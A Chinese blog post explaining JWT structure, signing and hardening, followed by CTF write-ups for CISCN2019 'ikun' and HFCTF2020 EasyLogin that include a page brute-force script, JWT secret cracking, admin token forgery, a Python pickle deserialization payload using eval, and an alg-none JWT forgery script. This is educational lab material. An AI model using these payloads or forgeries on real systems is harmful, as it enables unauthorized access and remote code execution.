



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="Hexo" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="Hexo" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="Hexo" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://example.com/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/">



  <title>
JWT - web安全 |
Yume Shoka = Hexo</title>
<meta name="generator" content="Hexo 5.4.2"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">JWT
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-11-17 13:38:45">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-11-17T13:38:45+08:00">2022-11-17</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Yume Shoka</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/e5221f7d85b0900837a45fb933fa34ec.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/3b386ae3affb92bf1cd0542648e24fc5.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/ecce74bba1d6312552d0156083825749.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/7dad57904e56f14df7975109aaf03bc2.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/9d916994e193f2640e3660e986b3226d.jpg"></li>
          <li class="item" data-background-image="https://img.timelessq.com/images/2022/07/26/ade7d346ca6d48abc5474c3e1c02f68c.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span><i class="ic i-angle-right"></i>
<span  class="current" itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem"><a href="/categories/web%E5%AE%89%E5%85%A8/" itemprop="item" rel="index" title="In web安全"><span itemprop="name">web安全</span></a>
<meta itemprop="position" content="1" /></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2022/11/17/JWT%20%E5%9F%BA%E7%A1%80/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="John Doe">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Hexo">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="jwt-基础"><a class="markdownIt-Anchor" href="#jwt-基础">#</a> JWT 基础</h1>
<p>JWT （JSON Web Token） 是目前最流行的跨域认证解决方案，是一种基于 Token 的认证授权机制。 从 JWT 的全称可以看出，JWT 本身也是 Token，一种规范化之后的 JSON 结构的 Token。</p>
<p>JWT 自身包含了身份验证所需要的所有信息，因此，我们的服务器不需要存储 Session 信息。这显然增加了系统的可用性和伸缩性，大大减轻了服务端的压力。</p>
<p>可以看出，<strong>JWT 更符合设计 RESTful API 时的「Stateless（无状态）」原则</strong> 。</p>
<p>并且， 使用 JWT 认证可以有效避免 CSRF 攻击，因为 JWT 一般是存在在 localStorage 中，使用 JWT 进行身份验证的过程中是不会涉及到 Cookie 的。</p>
<h2 id="localstorage与cookie"><a class="markdownIt-Anchor" href="#localstorage与cookie">#</a> localstorage 与 cookie</h2>
<p>localStorage 和 sessionStorage 属性允许在浏览器中存储 key/value 对的数据。</p>
<p>localStorage 用于长久保存整个网站的数据，保存的数据没有过期时间，直到手动去删除。</p>
<p>localStorage 属性是只读的。</p>
<p><strong>提示:</strong> 如果你只想将数据保存在当前会话中，可以使用 sessionStorage 属性， 该数据对象临时保存同一窗口 (或标签页) 的数据，在关闭窗口或标签页之后将会删除这些数据。</p>
<p><strong>localStorage 的优势</strong></p>
<ul>
<li>1、localStorage 拓展了 cookie 的 4K 限制。</li>
<li>2、localStorage 会可以将第一次请求的数据直接存储到本地，这个相当于一个 5M 大小的针对于前端页面的数据库，相比于 cookie 可以节约带宽，但是这个却是只有在高版本的浏览器中才支持的。</li>
</ul>
<p><strong>localStorage 的局限</strong></p>
<ul>
<li>1、浏览器的大小不统一，并且在 IE8 以上的 IE 版本才支持 localStorage 这个属性。</li>
<li>2、目前所有的浏览器中都会把 localStorage 的值类型限定为 string 类型，这个在对我们日常比较常见的 JSON 对象类型需要一些转换。</li>
<li>3、localStorage 在浏览器的隐私模式下面是不可读取的。</li>
<li>4、localStorage 本质上是对字符串的读取，如果存储内容多的话会消耗内存空间，会导致页面变卡。</li>
<li>5、localStorage 不能被爬虫抓取到。</li>
</ul>
<p>localStorage 与 sessionStorage 的唯一一点区别就是 localStorage 属于永久性存储，而 sessionStorage 属于当会话结束的时候，sessionStorage 中的键值对会被清空。</p>
<p>localStorage 的使用也是遵循同源策略的，所以不同的网站直接是不能共用相同的 localStorage。</p>
<p><strong>localStorage 使用</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">if(！window.localStorage)&#123;</span><br><span class="line">    alert(&quot;浏览器不支持localstorage&quot;);</span><br><span class="line">    return false;</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    var storage=window.localStorage;</span><br><span class="line">    //写入a字段</span><br><span class="line">    storage[&quot;a&quot;]=1;</span><br><span class="line">    //写入b字段</span><br><span class="line">    storage.b=1;</span><br><span class="line">    //写入c字段</span><br><span class="line">    storage.setItem(&quot;c&quot;,3);</span><br><span class="line">    console.log(typeof storage[&quot;a&quot;]);</span><br><span class="line">    console.log(typeof storage[&quot;b&quot;]);</span><br><span class="line">    console.log(typeof storage[&quot;c&quot;]);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><strong>localStorage 的读取</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">if(!window.localStorage)&#123;</span><br><span class="line">    alert(&quot;浏览器不支持localstorage&quot;);</span><br><span class="line">&#125;else&#123;</span><br><span class="line">    var storage=window.localStorage;</span><br><span class="line">    //写入a字段</span><br><span class="line">    storage[&quot;a&quot;]=1;</span><br><span class="line">    //写入b字段</span><br><span class="line">    storage.b=1;</span><br><span class="line">    //写入c字段</span><br><span class="line">    storage.setItem(&quot;c&quot;,3);</span><br><span class="line">    console.log(typeof storage[&quot;a&quot;]);</span><br><span class="line">    console.log(typeof storage[&quot;b&quot;]);</span><br><span class="line">    console.log(typeof storage[&quot;c&quot;]);</span><br><span class="line">    //第一种方法读取</span><br><span class="line">    var a=storage.a;</span><br><span class="line">    console.log(a);</span><br><span class="line">    //第二种方法读取</span><br><span class="line">    var b=storage[&quot;b&quot;];</span><br><span class="line">    console.log(b);</span><br><span class="line">    //第三种方法读取</span><br><span class="line">    var c=storage.getItem(&quot;c&quot;);</span><br><span class="line">    console.log(c);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>一般我们会将 JSON 存入 localStorage 中，但是在 localStorage 会自动将 localStorage 转换成为字符串形式。</p>
<p>这个时候我们可以使用 JSON.stringify () 这个方法，来将 JSON 转换成为 JSON 字符串。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">var storage=window.localStorage;</span><br><span class="line">var data=&#123;</span><br><span class="line">    name:&#x27;xiecanyong&#x27;,</span><br><span class="line">    sex:&#x27;man&#x27;,</span><br><span class="line">    hobby:&#x27;program&#x27;</span><br><span class="line">&#125;;</span><br><span class="line">var d=JSON.stringify(data);</span><br><span class="line">storage.setItem(&quot;data&quot;,d);</span><br><span class="line">//将JSON字符串转换成为JSON对象输出</span><br><span class="line">var json=storage.getItem(&quot;data&quot;);</span><br><span class="line">var jsonObj=JSON.parse(json);</span><br><span class="line">console.log(typeof jsonObj);</span><br></pre></td></tr></table></figure>
<p>打印出来是 Object 对象。</p>
<p>另外还有一点要注意的是，其他类型读取出来也要进行转换。</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221206150034668.png" alt="image-20221206150034668"></p>
<h2 id="jwt组成"><a class="markdownIt-Anchor" href="#jwt组成">#</a> JWT 组成</h2>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/jwt-composition.png" alt=""></p>
<p>JWT 本质上就是一组字串，通过（ <code>.</code> ）切分成三个为 Base64 编码的部分：</p>
<ul>
<li><strong>Header</strong> : 描述 JWT 的元数据，定义了生成签名的算法以及  <code>Token</code>  的类型。</li>
<li><strong>Payload</strong> : 用来存放实际需要传递的数据</li>
<li><strong>Signature（签名）</strong> ：服务器通过 Payload、Header 和一个密钥 (Secret) 使用 Header 里面指定的签名算法（默认是 HMAC SHA256）生成。</li>
</ul>
<p>JWT 通常是这样的： <code>xxxxx.yyyyy.zzzzz</code> 。</p>
<p>示例：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.</span><br><span class="line">eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.</span><br><span class="line">SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c</span><br></pre></td></tr></table></figure>
<p>你可以在 <span class="exturl" data-url="aHR0cHM6Ly9qd3QuaW8v">jwt.ioopen in new window</span> 这个网站上对其 JWT 进行解码，解码之后得到的就是 Header、Payload、Signature 这三部分。</p>
<p>Header 和 Payload 都是 JSON 格式的数据，Signature 由 Payload、Header 和 Secret (密钥) 通过特定的计算公式和加密算法得到。</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/jwt.io.png" alt="img"></p>
<h3 id="header"><a class="markdownIt-Anchor" href="#header">#</a> header</h3>
<p>Header 通常由两部分组成：</p>
<ul>
<li><code>typ</code> （Type）：令牌类型，也就是 JWT。</li>
<li><code>alg</code> （Algorithm） ：签名算法，比如 HS256。</li>
</ul>
<p>示例：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;alg&quot;</span><span class="punctuation">:</span> <span class="string">&quot;HS256&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;typ&quot;</span><span class="punctuation">:</span> <span class="string">&quot;JWT&quot;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p>JSON 形式的 Header 被转换成 Base64 编码，成为 JWT 的第一部分。</p>
<h3 id="payload"><a class="markdownIt-Anchor" href="#payload">#</a> Payload</h3>
<p>Payload 也是 JSON 格式数据，其中包含了 Claims (声明，包含 JWT 的相关信息)。</p>
<p>Claims 分为三种类型：</p>
<ul>
<li><strong>Registered Claims（注册声明）</strong> ：预定义的一些声明，建议使用，但不是强制性的。</li>
<li><strong>Public Claims（公有声明）</strong> ：JWT 签发方可以自定义的声明，但是为了避免冲突，应该在 <span class="exturl" data-url="aHR0cHM6Ly93d3cuaWFuYS5vcmcvYXNzaWdubWVudHMvand0L2p3dC54aHRtbA==">IANA JSON Web Token Registryopen in new window</span> 中定义它们。</li>
<li><strong>Private Claims（私有声明）</strong> ：JWT 签发方因为项目需要而自定义的声明，更符合实际项目场景使用。</li>
</ul>
<p>下面是一些常见的注册声明：</p>
<ul>
<li><code>iss</code> （issuer）：JWT 签发方。</li>
<li><code>iat</code> （issued at time）：JWT 签发时间。</li>
<li><code>sub</code> （subject）：JWT 主题。</li>
<li><code>aud</code> （audience）：JWT 接收方。</li>
<li><code>exp</code> （expiration time）：JWT 的过期时间。</li>
<li><code>nbf</code> （not before time）：JWT 生效时间，早于该定义的时间的 JWT 不能被接受处理。</li>
<li><code>jti</code> （JWT ID）：JWT 唯一标识。</li>
</ul>
<p>示例：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;uid&quot;</span><span class="punctuation">:</span> <span class="string">&quot;ff1212f5-d8d1-4496-bf41-d2dda73de19a&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;sub&quot;</span><span class="punctuation">:</span> <span class="string">&quot;1234567890&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;John Doe&quot;</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;exp&quot;</span><span class="punctuation">:</span> <span class="number">15323232</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;iat&quot;</span><span class="punctuation">:</span> <span class="number">1516239022</span><span class="punctuation">,</span></span><br><span class="line">  <span class="attr">&quot;scope&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;admin&quot;</span><span class="punctuation">,</span> <span class="string">&quot;user&quot;</span><span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>
<p>Payload 部分默认是不加密的，<strong>一定不要将隐私信息存放在 Payload 当中！！！</strong></p>
<p>JSON 形式的 Payload 被转换成 Base64 编码，成为 JWT 的第二部分。</p>
<h3 id="signature"><a class="markdownIt-Anchor" href="#signature">#</a> Signature</h3>
<p>Signature 部分是对前两部分的签名，作用是防止 JWT（主要是 payload） 被篡改。</p>
<p>这个签名的生成需要用到：</p>
<ul>
<li>Header + Payload。</li>
<li>存放在服务端的密钥 (一定不要泄露出去)。</li>
<li>签名算法。</li>
</ul>
<p>签名的计算公式如下：</p>
<figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">HMACSHA256(</span><br><span class="line">  base64UrlEncode(header) + &quot;.&quot; +</span><br><span class="line">  base64UrlEncode(payload),</span><br><span class="line">  secret)</span><br></pre></td></tr></table></figure>
<p>算出签名以后，把 Header、Payload、Signature 三个部分拼成一个字符串，每个部分之间用 &quot;点&quot;（ <code>.</code> ）分隔，这个字符串就是 JWT 。</p>
<h2 id="jwt进行身份验证"><a class="markdownIt-Anchor" href="#jwt进行身份验证">#</a> JWT 进行身份验证</h2>
<p>在基于 JWT 进行身份验证的的应用程序中，服务器通过 Payload、Header 和 Secret (密钥) 创建 JWT 并将 JWT 发送给客户端。客户端接收到 JWT 之后，会将其保存在 Cookie 或者 localStorage 里面，以后客户端发出的所有请求都会携带这个令牌</p>
<p>Session 是在服务器端的，而 JWT 是在客户端的。</p>
<p>![](<span class="exturl" data-url="aHR0cHM6Ly9rYnNoaXJlLTEzMDg5ODE2OTcuY29zLmFwLXNoYW5naGFpLm15cWNsb3VkLmNvbS9pbWcvand0LWF1dGhlbnRpY2F0aW9u">https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/jwt-authentication</span> process.png)</p>
<p>简化后的步骤如下：</p>
<ol>
<li>用户向服务器发送用户名、密码以及验证码用于登陆系统。</li>
<li>如果用户用户名、密码以及验证码校验正确的话，服务端会返回已经签名的 Token，也就是 JWT。</li>
<li>用户以后每次向后端发请求都在 Header 中带上这个 JWT 。</li>
<li>服务端检查 JWT 并从中获取用户相关信息。</li>
</ol>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221206152548804.png" alt="image-20221206152548804"></p>
<p>两点建议：</p>
<ol>
<li>建议将 JWT 存放在 localStorage 中，放在 Cookie 中会有 CSRF 风险。</li>
<li>请求服务端并携带 JWT 的常见做法是将其放在 HTTP Header 的  <code>Authorization</code>  字段中（ <code>Authorization: Bearer Token</code> ）。</li>
</ol>
<h2 id="防止-jwt-被篡改"><a class="markdownIt-Anchor" href="#防止-jwt-被篡改">#</a> 防止 JWT 被篡改</h2>
<p>有了签名之后，即使 JWT 被泄露或者截获，黑客也没办法同时篡改 Signature 、Header 、Payload。</p>
<p>这是为什么呢？因为服务端拿到 JWT 之后，会解析出其中包含的 Header、Payload 以及 Signature 。服务端会根据 Header、Payload、密钥再次生成一个 Signature。拿新生成的 Signature 和 JWT 中的 Signature 作对比，如果一样就说明 Header 和 Payload 没有被修改。</p>
<p>不过，如果服务端的秘钥也被泄露的话，黑客就可以同时篡改 Signature 、Header 、Payload 了。黑客直接修改了 Header 和 Payload 之后，再重新生成一个 Signature 就可以了。</p>
<p><strong>密钥一定保管好，一定不要泄露出去。JWT 安全的核心在于签名，签名安全的核心在密钥。</strong></p>
<h2 id="如何加强-jwt-的安全性"><a class="markdownIt-Anchor" href="#如何加强-jwt-的安全性">#</a> 如何加强 JWT 的安全性？</h2>
<ol>
<li>使用安全系数高的加密算法。</li>
<li>使用成熟的开源库，没必要造轮子。</li>
<li>JWT 存放在 localStorage 中而不是 Cookie 中，避免 CSRF 风险。</li>
<li>一定不要将隐私信息存放在 Payload 当中。</li>
<li>密钥一定保管好，一定不要泄露出去。JWT 安全的核心在于签名，签名安全的核心在密钥。</li>
<li>Payload 要加入  <code>exp</code>  （JWT 的过期时间），永久有效的 JWT 不合理。并且，JWT 的过期时间不易过长。</li>
</ol>
<h2 id="jwt优势"><a class="markdownIt-Anchor" href="#jwt优势">#</a> jwt 优势</h2>
<p>相比于 Session 认证的方式来说，使用 JWT 进行身份认证主要有下面 4 个优势。</p>
<h3 id="无状态"><a class="markdownIt-Anchor" href="#无状态">#</a> 无状态</h3>
<p>JWT 自身包含了身份验证所需要的所有信息，因此，我们的服务器不需要存储 Session 信息。这显然增加了系统的可用性和伸缩性，大大减轻了服务端的压力。</p>
<h3 id="有效避免了-csrf-攻击"><a class="markdownIt-Anchor" href="#有效避免了-csrf-攻击">#</a> 有效避免了 CSRF 攻击</h3>
<p>一般情况下我们使用 JWT 的话，在我们登录成功获得 JWT 之后，一般会选择存放在 localStorage 中。前端的每一个请求后续都会附带上这个 JWT，整个过程压根不会涉及到 Cookie。因此，即使你点击了非法链接发送了请求到服务端，这个非法请求也是不会携带 JWT 的，所以这个请求将是非法的。</p>
<p>总结来说就一句话：<strong>使用 JWT 进行身份验证不需要依赖 Cookie ，因此可以避免 CSRF 攻击。</strong></p>
<h3 id="适合移动端应用"><a class="markdownIt-Anchor" href="#适合移动端应用">#</a> 适合移动端应用</h3>
<p>使用 Session 进行身份认证的话，需要保存一份信息在服务器端，而且这种方式会依赖到 Cookie（需要 Cookie 保存  <code>SessionId</code> ），所以不适合移动端。</p>
<p>但是，使用 JWT 进行身份认证就不会存在这种问题，因为只要 JWT 可以被客户端存储就能够使用，而且 JWT 还可以跨语言使用。</p>
<h3 id="单点登录友好"><a class="markdownIt-Anchor" href="#单点登录友好">#</a> 单点登录友好</h3>
<p>使用 Session 进行身份认证的话，实现单点登录，需要我们把用户的 Session 信息保存在一台电脑上，并且还会遇到常见的 Cookie 跨域的问题。但是，使用 JWT 进行认证的话， JWT 被保存在客户端，不会存在这些问题。</p>
<h2 id="jwt在ctf中运用"><a class="markdownIt-Anchor" href="#jwt在ctf中运用">#</a> jwt 在 ctf 中运用</h2>
<h3 id="ciscn2019-华北赛区-day1-web2ikun"><a class="markdownIt-Anchor" href="#ciscn2019-华北赛区-day1-web2ikun">#</a> [CISCN2019 华北赛区 Day1 Web2] ikun</h3>
<p>1. 通过脚本爆破 lv6 的 page</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import requests</span><br><span class="line">url=&quot;http://3ecc60d7-c14f-4805-9476-71bcd91747c8.node3.buuoj.cn/shop?page=&quot;</span><br><span class="line"></span><br><span class="line">for i in range(0,2000):</span><br><span class="line">    print(i)</span><br><span class="line">    r=requests.get( url + str(i) )</span><br><span class="line">    if &#x27;lv6.png&#x27; in r.text:</span><br><span class="line">        print (i)</span><br><span class="line">        break</span><br></pre></td></tr></table></figure>
<p>2. 随便注册，然后登陆</p>
<p>3. 将 lv6 加入购物车然后抓包，修改 discount 和 jwt</p>
<p>修改 jwt 时涉及到 jwt 伪造和 secret 爆破</p>
<p><span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2JyZW5kYW4tcml1cy9jLWp3dC1jcmFja2Vy">brendan-rius/c-jwt-cracker: JWT brute force cracker written in C (github.com)</span></p>
<p>通过 jwtcracker 爆破 secret，得到 <code>1Kun</code></p>
<p>题目中还说需要 admin，那就伪造</p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221207135357827.png" alt="image-20221207135357827"></p>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221207140037810.png" alt="image-20221207140037810"></p>
<p>4. 源码泄露，python 反序列化</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">import tornado.web</span><br><span class="line">from sshop.base import BaseHandler</span><br><span class="line">import pickle</span><br><span class="line">import urllib</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class AdminHandler(BaseHandler):</span><br><span class="line">    @tornado.web.authenticated</span><br><span class="line">    def get(self, *args, **kwargs):</span><br><span class="line">        if self.current_user == &quot;admin&quot;:</span><br><span class="line">            return self.render(&#x27;form.html&#x27;, res=&#x27;This is Black Technology!&#x27;, member=0)</span><br><span class="line">        else:</span><br><span class="line">            return self.render(&#x27;no_ass.html&#x27;)</span><br><span class="line"></span><br><span class="line">    @tornado.web.authenticated</span><br><span class="line">    def post(self, *args, **kwargs):</span><br><span class="line">        try:</span><br><span class="line">            become = self.get_argument(&#x27;become&#x27;)</span><br><span class="line">            p = pickle.loads(urllib.unquote(become))</span><br><span class="line">            return self.render(&#x27;form.html&#x27;, res=p, member=1)</span><br><span class="line">        except:</span><br><span class="line">            return self.render(&#x27;form.html&#x27;, res=&#x27;This is Black Technology!&#x27;, member=0)</span><br></pre></td></tr></table></figure>
<p>payload:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">import urllib</span><br><span class="line"></span><br><span class="line">class payload(object):</span><br><span class="line">    def __reduce__(self):</span><br><span class="line">       return (eval, (&quot;open(&#x27;/flag.txt&#x27;,&#x27;r&#x27;).read()&quot;,))    #打开读取flag.txt的内容</span><br><span class="line"></span><br><span class="line">a = pickle.dumps(payload())  #序列化payload</span><br><span class="line">a = urllib.quote(a)  #进行url编码</span><br><span class="line">print a</span><br><span class="line"></span><br><span class="line"># c__builtin__%0Aeval%0Ap0%0A%28S%22open%28%27/flag.txt%27%2C%27r%27%29.read%28%29%22%0Ap1%0Atp2%0ARp3%0A.</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p><img data-src="https://kbshire-1308981697.cos.ap-shanghai.myqcloud.com/img/image-20221207140234730.png" alt="image-20221207140234730"></p>
<h3 id="hfctf2020easylogin"><a class="markdownIt-Anchor" href="#hfctf2020easylogin">#</a> [HFCTF2020]EasyLogin</h3>
<p><strong>Node 的 JWT 库的空加密缺陷</strong></p>
<p>通过查看源码，发现 /static/js/app.js 页面存在提示<br>
<strong> koa-static 错误配置的源码泄露</strong><br>
说明 app.js 是直接静态映射到程序根目录的，直接访问根目录的该文件可直接看到源码</p>
<blockquote>
<p>/**<br>
*  或许该用 koa-static 来处理静态文件<br>
 *  路径该怎么配置？不管了先填个根目录 XD<br>
*/</p>
</blockquote>
<p>关与 node 的代码分析不再叙述，可以到哦下面的连接自己看</p>
<p><strong>1. 将加密方式改为 none</strong></p>
<blockquote>
<p>签名算法确保恶意用户在传输过程中不会修改 JWT。但是标题中的 alg 字段可以更改为 none。一些 JWT 库支持无算法，即没有签名算法。当 alg 为 none 时，后端将不执行签名验证。将 alg 更改为 none 后，从 JWT 中删除签名数据（仅标题 +’.’+ payload +’.’）并将其提交给服务器。</p>
</blockquote>
<p><strong>2、secretid 值校验</strong><br>
要求 sid 不能为 undefined，null，并且必须在全局变量 secrets 数组的长度和 0 之间。<br>
JavaScript 是一门弱类型语言，可以通过空数组与数字比较永远为真或是小数来绕过</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># py脚本</span><br><span class="line">import jwt</span><br><span class="line">token = jwt.encode(&#123;&quot;secretid&quot;:0.1,&quot;username&quot;:&quot;admin&quot;,&quot;password&quot;:&quot;admin&quot;&#125;,algorithm=&quot;none&quot;,key=&quot;&quot;)</span><br><span class="line">print(token)</span><br></pre></td></tr></table></figure>
<p>3. 登录时抓包改 authorization</p>
